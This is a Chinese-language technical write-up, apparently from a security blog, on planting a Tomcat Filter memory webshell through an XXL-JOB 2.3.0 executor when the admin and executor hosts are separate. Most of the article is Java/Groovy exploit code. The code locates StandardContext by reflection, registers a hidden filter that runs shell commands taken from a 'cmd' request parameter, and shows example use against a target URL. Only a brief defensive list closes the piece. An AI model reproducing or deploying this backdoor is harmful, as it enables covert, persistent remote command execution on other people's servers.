XXL-JOB Executor Filter内存马注入技术分析<\/h1>

一、背景与适用场景<\/h2>

XXL-JOB是一个分布式任务调度平台，分为管理端(xxl-job-admin)和执行端(xxl-job-executor)。传统的内存马注入技术要求管理端和执行端处于同一台主机上，本文介绍了一种针对端点分离情况的Filter内存马注入技术。<\/p>

适用场景<\/strong>：<\/p>

目标环境不出网<\/li>
xxl-job-admin和xxl-job-executor不在同一台主机<\/li>
测试环境为xxl-job-2.3.0(tomcat9)，其他版本未测试<\/li> <\/ul>
二、技术原理分析<\/h2>
1. XXL-JOB端口配置<\/h3>
在application.properties<\/code>中有两个关键端口配置：<\/p>
# web端口 server.port=8081 # xxl-job executor服务端口 xxl.job.executor.port=9999 <\/code><\/pre> executor.port<\/code>(9999)后端是Netty服务<\/li> server.port<\/code>(8081)是Tomcat服务，虽然返回whitelable error page，但仍可用于注入Filter内存马<\/li> <\/ul> 2. 技术难点<\/h3> StandardContext获取问题<\/strong>：<\/p> embedded-tomcat无法使用通用payload获取StandardContext<\/li> 需要自行构造exp获取StandardContext<\/li> <\/ul> <\/li> Java-object-searcher工具修改<\/strong>：<\/p> 原工具存在表达式执行问题，需修改构造函数<\/li> 修改后的构造函数： public<\/span> SearchRequstByBFS<\/span>(<\/span>Object target){<\/span> <\/span><\/span> this<\/span>.<\/span>target<\/span> =<\/span> target;<\/span> <\/span><\/span> q.<\/span>offer<\/span>(<\/span>new<\/span> NodeT.<\/span>Builder<\/span>().<\/span>setChain<\/span>(<\/span>""<\/span>).<\/span>setField_name<\/span>(<\/span>"TargetObject"<\/span>).<\/span>setField_object<\/span>(<\/span>target).<\/span>build<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 添加addKey()<\/code>方法： public<\/span> void<\/span> addKey<\/span>(<\/span>Keyword keyword){<\/span> <\/span><\/span> this<\/span>.<\/span>keys<\/span>.<\/span>add<\/span>(<\/span>keyword);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 三、详细实现步骤<\/h2> 1. 搜索Request对象<\/h3> 使用修改后的java-object-searcher搜索Request对象：<\/p> \/\/ 定义黑名单 <\/span><\/span><\/span><\/span>List<<\/span>Blacklist><\/span> blacklists =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span>blacklists.<\/span>add<\/span>(<\/span>new<\/span> Blacklist.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"java.io.File"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 新建搜索器 <\/span><\/span><\/span><\/span>SearchRequstByBFS searcher =<\/span> new<\/span> SearchRequstByBFS(<\/span>Thread.<\/span>currentThread<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置搜索类型 <\/span><\/span><\/span><\/span>searcher.<\/span>addKey<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"ServletRequest"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>searcher.<\/span>addKey<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"RequestGroup"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>searcher.<\/span>addKey<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"RequestInfo"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>searcher.<\/span>addKey<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"RequestGroupInfo"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span>searcher.<\/span>addKey<\/span>(<\/span>new<\/span> Keyword.<\/span>Builder<\/span>().<\/span>setField_type<\/span>(<\/span>"Request"<\/span>).<\/span>build<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置搜索参数 <\/span><\/span><\/span><\/span>searcher.<\/span>setBlacklists<\/span>(<\/span>blacklists);<\/span> <\/span><\/span>searcher.<\/span>setIs_debug<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>searcher.<\/span>setMax_search_depth<\/span>(<\/span>20<\/span>);<\/span> <\/span><\/span>searcher.<\/span>setReport_save_path<\/span>(<\/span>"D:\\temp"<\/span>);<\/span> <\/span><\/span>searcher.<\/span>searchObject<\/span>();<\/span> <\/span><\/span><\/code><\/pre>2. 获取StandardContext<\/h3> 通过线程分析获取TomcatEmbeddedContext(StandardContext)：<\/p> 获取当前线程组<\/li> 遍历线程组中的所有线程<\/li> 查找包含"container"或"http-nio-"的线程<\/li> 从线程中获取Tomcat容器相关对象<\/li> <\/ol> 3. 构造Filter内存马<\/h3> 完整EXP代码结构：<\/p> import<\/span> javax.servlet.*;<\/span> <\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span> <\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span> <\/span><\/span>import<\/span> java.io.BufferedReader;<\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.Context;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.core.ApplicationFilterConfig;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span> <\/span><\/span>import<\/span> org.apache.tomcat.util.descriptor.web.FilterDef;<\/span> <\/span><\/span>import<\/span> org.apache.tomcat.util.descriptor.web.FilterMap;<\/span> <\/span><\/span>\/\/ 其他必要的import <\/span><\/span><\/span><\/span> <\/span><\/span>public<\/span> class<\/span> DemoGlueJobHandler<\/span> extends<\/span> IJobHandler {<\/span> <\/span><\/span> \/\/ 辅助方法：获取字段值 <\/span><\/span><\/span><\/span> public<\/span> Object getField<\/span>(<\/span>Object obj,<\/span> String fieldName){...}<\/span> <\/span><\/span> <\/span><\/span> \/\/ 辅助方法：获取父类字段值 <\/span><\/span><\/span><\/span> public<\/span> Object getSuperClassField<\/span>(<\/span>Object obj,<\/span> String fieldName){...}<\/span> <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> execute<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 创建filter <\/span><\/span><\/span><\/span> Filter filter =<\/span> new<\/span> Filter()<\/span> {<\/span> <\/span><\/span> public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> throws<\/span> ServletException {}<\/span> <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> <\/span><\/span> FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span> <\/span><\/span> \/\/ 命令执行逻辑 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ 处理命令执行和回显 <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> return<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span> servletResponse);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> void<\/span> destroy<\/span>()<\/span> {}<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> String filterName =<\/span> "xxl-job-filter"<\/span>;<\/span> <\/span><\/span> <\/span><\/span> \/\/ 2. 创建FilterDef <\/span><\/span><\/span><\/span> FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span> <\/span><\/span> filterDef.<\/span>setFilter<\/span>(<\/span>filter);<\/span> <\/span><\/span> filterDef.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span> <\/span><\/span> filterDef.<\/span>setFilterClass<\/span>(<\/span>filter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span> <\/span><\/span> <\/span><\/span> \/\/ 3. 创建FilterMap <\/span><\/span><\/span><\/span> FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span> <\/span><\/span> filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span> <\/span><\/span> filterMap.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span> <\/span><\/span> filterMap.<\/span>setDispatcher<\/span>(<\/span>DispatcherType.<\/span>REQUEST<\/span>.<\/span>name<\/span>());<\/span> <\/span><\/span> <\/span><\/span> \/\/ 4. 准备ApplicationFilterConfig构造函数 <\/span><\/span><\/span><\/span> Constructor constructor =<\/span> ApplicationFilterConfig.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span> <\/span><\/span> Context.<\/span>class<\/span>,<\/span> FilterDef.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 5. 获取StandardContext <\/span><\/span><\/span><\/span> \/\/ ... (线程分析代码) <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 6. 注入Filter <\/span><\/span><\/span><\/span> StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span> children.<\/span>get<\/span>(<\/span>""<\/span>);<\/span> <\/span><\/span> standardContext.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span> <\/span><\/span> <\/span><\/span> Map filterConfigs =<\/span> (<\/span>Map)<\/span> getSuperClassField(<\/span>standardContext,<\/span> "filterConfigs"<\/span>);<\/span> <\/span><\/span> ApplicationFilterConfig filterConfig =<\/span> (<\/span>ApplicationFilterConfig)<\/span> <\/span><\/span> constructor.<\/span>newInstance<\/span>(<\/span>standardContext,<\/span> filterDef);<\/span> <\/span><\/span> filterConfigs.<\/span>put<\/span>(<\/span>filterName,<\/span> filterConfig);<\/span> <\/span><\/span> <\/span><\/span> standardContext.<\/span>addFilterMapBefore<\/span>(<\/span>filterMap);<\/span> <\/span><\/span> XxlJobHelper.<\/span>log<\/span>(<\/span>"success! memshell port:"<\/span>+<\/span>port);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 关键实现细节<\/h3> 命令执行处理<\/strong>：<\/p> 由于XXL-JOB中的Groovy不支持new String[]{"cmd.exe", "\/c", cmd}<\/code>语法，改用ArrayList方式： ArrayList<<\/span>String><\/span> cmdList =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span>String osTyp =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>);<\/span> <\/span><\/span>if<\/span> (<\/span>osTyp !=<\/span> null<\/span> &&<\/span> osTyp.<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>))<\/span> {<\/span> <\/span><\/span> cmdList.<\/span>add<\/span>(<\/span>"cmd.exe"<\/span>);<\/span> <\/span><\/span> cmdList.<\/span>add<\/span>(<\/span>"\/c"<\/span>);<\/span> <\/span><\/span>}<\/span> else<\/span> {<\/span> <\/span><\/span> cmdList.<\/span>add<\/span>(<\/span>"\/bin\/bash"<\/span>);<\/span> <\/span><\/span> cmdList.<\/span>add<\/span>(<\/span>"-c"<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span>cmdList.<\/span>add<\/span>(<\/span>req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>));<\/span> <\/span><\/span>String[]<\/span> cmds =<\/span> cmdList.<\/span>toArray<\/span>(<\/span>new<\/span> String[<\/span>0<\/span>]);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 线程分析获取StandardContext<\/strong>：<\/p> 查找名称包含"container"的线程获取Tomcat容器<\/li> 查找名称包含"http-nio-"的线程获取web端口<\/li> 通过反射获取Tomcat内部对象链：this$0<\/code> → tomcat<\/code> → server<\/code> → services<\/code> → engine<\/code> → children<\/code><\/li> <\/ul> <\/li> Filter注入<\/strong>：<\/p> 创建FilterDef并设置filter实例<\/li> 创建FilterMap并设置URL模式<\/li> 通过反射创建ApplicationFilterConfig<\/li> 将Filter添加到StandardContext的filterConfigs中<\/li> 使用addFilterMapBefore<\/code>确保Filter优先执行<\/li> <\/ul> <\/li> <\/ol> 四、验证与使用<\/h2> 注入成功后，日志会输出executor的web端口<\/li> 访问注入的端口(默认8081)，添加cmd参数执行命令 http:\/\/target:8081\/?cmd=whoami <\/code><\/pre> <\/li> <\/ol> 五、注意事项<\/h2> Groovy语法限制<\/strong>：<\/p> 不支持内部类写法，字符串中的this$0<\/code>需要转义<\/li> 不支持new Class[]{String.class, int.class}<\/code>语法，需使用ArrayList替代<\/li> <\/ul> <\/li> 环境差异<\/strong>：<\/p> 默认假设StandardContext路径为localhost<\/code> → ""<\/code><\/li> 不同环境可能需要调整children的key<\/li> <\/ul> <\/li> 端口访问<\/strong>：<\/p> 需要先访问8081端口激活RequestInfo<\/li> 虽然该端口返回whitelable error page，但不影响内存马功能<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 限制XXL-JOB执行端的代码执行权限<\/li> 监控不常见的Filter添加行为<\/li> 定期检查Tomcat的Filter配置<\/li> 更新XXL-JOB到最新版本，关注安全公告<\/li> <\/ol> 本技术提供了一种在XXL-JOB执行端注入Filter内存马的方法，适用于管理端和执行端分离的场景，通过Tomcat的8081端口实现命令执行功能。<\/p>